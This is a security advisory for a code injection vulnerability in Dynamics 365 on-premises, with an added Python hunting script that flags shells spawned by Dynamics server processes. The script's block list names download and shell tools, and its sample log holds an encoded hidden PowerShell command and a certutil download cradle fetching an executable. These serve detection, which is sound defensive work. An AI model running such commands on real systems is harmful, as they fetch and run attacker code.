CVE-2026-42898

Microsoft · Dynamics 365

Microsoft Dynamics 365 (on-premises) contains a code injection vulnerability that allows an authorized attacker to execute arbitrary code over the network.

Executive summary

A critical code injection vulnerability in Microsoft Dynamics 365 (on-premises) could allow an attacker who already holds an authorized account to execute arbitrary code on the application server over the network, putting the confidentiality, integrity and availability of the whole Dynamics environment at risk.

Vulnerability

The underlying weakness is improper control of code generation (the CWE-94 code injection class): input supplied by an authenticated user reaches a code path where it is treated as code rather than as data, and the resulting code runs with the rights of the Dynamics 365 server process. Exploitation is over the network and requires an account that is already authorized in the deployment, so the precondition is valid credentials rather than an unauthenticated network position; the flaw turns any authorized user, or any stolen or phished credential, into server-side code execution.

Business impact

Successful exploitation could lead to total compromise of the Dynamics 365 environment: unauthorized access to and modification of business data, and takeover of the server hosting the application, which in turn exposes the service accounts, database connections and network position that server holds. With a CVSS score of 9.9 the vulnerability is classified as critical. If the score is on the CVSS v3 scale, a 9.9 for a low-privilege network attack corresponds to a changed scope with high confidentiality, integrity and availability impact, i.e. the damage is not confined to the data the attacker's own account could already reach.

Remediation

Immediate Action: Update Microsoft Dynamics 365 (on-premises) to the fixed version specified in Microsoft's security advisory for this CVE, and confirm the installed build afterwards. The on-premises edition is the affected product named here; apply the vendor's guidance for any other deployment model.

Proactive Monitoring: Because the flaw is exercised by an account that is already authorized, failed-logon alerts will not catch it. Look instead for post-exploitation signals on the application server: the Dynamics server processes (the IIS worker process and the Dynamics service processes) spawning command interpreters or download tooling, unexpected outbound connections from the application server, and privileged or administrative actions in the Dynamics audit log performed by accounts that do not normally perform them.

Compensating Controls: Segment the application server from workstations and from tier-0 assets such as domain controllers so that a compromised server cannot pivot directly. Enforce least privilege twice over: on Dynamics 365 user roles, to shrink the set of accounts that can reach the vulnerable functionality, and on the Windows service accounts the application runs under, since injected code executes with those accounts' rights.
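The monitoring item above is easiest to make concrete as a detection rule over process-creation telemetry. The following is an added example and is not code from the advisory or from Microsoft: a small Python hunt that reads Sysmon Event ID 1 (process creation) records serialised as JSON lines, the shape a forwarder typically emits, and flags children spawned by the Dynamics 365 on-premises host processes. The parent process names (w3wp.exe for the IIS worker, CrmAsyncService.exe and Microsoft.Crm.Sandbox.WorkerProcess.exe for the Dynamics services), the install paths, the service account names and every event in SAMPLE_LOG are assumptions constructed for the example; verify the process list against your own deployment before using it.

```python
"""Added example (not from the advisory): flag shells or download tooling spawned by
Dynamics 365 (on-premises) server processes, a generic post-exploitation signal for a
web-facing code-injection flaw being turned into command execution."""
import json
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

# Assumption: these are the processes that execute Dynamics 365 on-premises server-side
# code (IIS worker, asynchronous service, sandbox worker). Tune to your deployment.
DYNAMICS_PARENTS = {
    "w3wp.exe",
    "crmasyncservice.exe",
    "microsoft.crm.sandbox.workerprocess.exe",
}

# Children a Dynamics worker process has no legitimate reason to start.
LOLBIN_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "curl.exe", "net.exe", "net1.exe", "whoami.exe", "schtasks.exe",
}

# Children routinely seen under w3wp in a healthy install, e.g. csc.exe from ASP.NET
# dynamic compilation (assumption; baseline this locally before suppressing).
BENIGN_CHILDREN = {"conhost.exe", "csc.exe", "cvtres.exe", "werfault.exe"}

# Command-line fragments that turn a suspicious spawn into a near-certain intrusion.
CMDLINE_MARKERS = ("-enc", "-encodedcommand", "downloadstring", "iex ",
                   "invoke-expression", "frombase64string", "http://", "https://")


@dataclass
class Finding:
    severity: str
    reason: str
    utc_time: str
    computer: str
    user: str
    parent: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry, keeping only process-creation events (Sysmon ID 1)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            if ev.get("EventID") == 1:
                events.append(ev)
    return events


def classify(ev: dict) -> Optional[Finding]:
    """Return a Finding when a Dynamics host process spawns something it should not."""
    parent = _basename(ev.get("ParentImage", ""))
    if parent not in DYNAMICS_PARENTS:
        return None                      # not a Dynamics process: out of scope here
    child = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if child in BENIGN_CHILDREN:
        return None
    if child in LOLBIN_CHILDREN:
        severity, reason = "high", f"{parent} spawned {child}"
        if any(marker in cmd.lower() for marker in CMDLINE_MARKERS):
            severity, reason = "critical", reason + " with download/encoded command line"
    else:
        severity, reason = "medium", f"{parent} spawned unexpected child {child}"
    return Finding(severity, reason, ev.get("UtcTime", ""), ev.get("Computer", ""),
                   ev.get("User", ""), parent, child, cmd)


def hunt(text: str) -> list:
    """Run the rule over a JSON-lines log and return findings in log order."""
    return [f for f in (classify(ev) for ev in parse_events(text)) if f is not None]


# Constructed sample telemetry for the example; not real events from any system.
SAMPLE_LOG = r"""
{"UtcTime":"2026-05-02 09:14:02","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmapp","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","Image":"C:\\Windows\\System32\\conhost.exe","CommandLine":"conhost.exe 0x4"}
{"UtcTime":"2026-05-02 09:14:05","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmapp","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","CommandLine":"csc.exe /noconfig /fullpaths @C:\\Windows\\Temp\\abc.cmdline"}
{"UtcTime":"2026-05-02 09:21:40","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmapp","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c whoami"}
{"UtcTime":"2026-05-02 09:22:11","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmasync","ParentImage":"C:\\Program Files\\Microsoft Dynamics CRM\\Server\\bin\\CrmAsyncService.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"UtcTime":"2026-05-02 09:22:30","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmsandbox","ParentImage":"C:\\Program Files\\Microsoft Dynamics CRM\\Server\\bin\\Microsoft.Crm.Sandbox.WorkerProcess.exe","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://203.0.113.10/a.exe C:\\Windows\\Temp\\a.exe"}
{"UtcTime":"2026-05-02 09:25:00","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\admin1","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe"}
{"UtcTime":"2026-05-02 09:26:13","EventID":1,"Computer":"crm-app01","User":"CONTOSO\\svc-crmapp","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","Image":"C:\\Users\\Public\\update.exe","CommandLine":"update.exe"}
{"UtcTime":"2026-05-02 09:26:14","EventID":3,"Computer":"crm-app01","User":"CONTOSO\\svc-crmapp","Image":"C:\\Users\\Public\\update.exe","DestinationIp":"203.0.113.10","DestinationPort":443}
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.severity:8}] {f.utc_time} {f.computer} {f.user}: {f.reason} :: {f.command_line}")
```

On the constructed sample the rule stays silent on conhost.exe and csc.exe, raises high on the interactive shell, critical on the encoded PowerShell and the certutil download cradle, medium on an unknown binary launched from a world-writable directory, and ignores the administrator's cmd.exe under explorer.exe, which is not a Dynamics process. The network-connection event (ID 3) is deliberately left to a separate rule; correlating it by process with the medium finding is the natural next step for the "suspicious network activity" half of the monitoring advice.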

Exploitation status

Public Exploit Available: No

Analyst recommendation

Given the critical severity score and the fact that any authorized account suffices for remote code execution, organizations should prioritize patching their on-premises Dynamics 365 instances immediately. Confirm the fixed build in Microsoft's security advisory, apply the update, verify the installed version afterwards, and review the application server for the post-exploitation indicators described under Remediation before assuming the window of exposure was not used.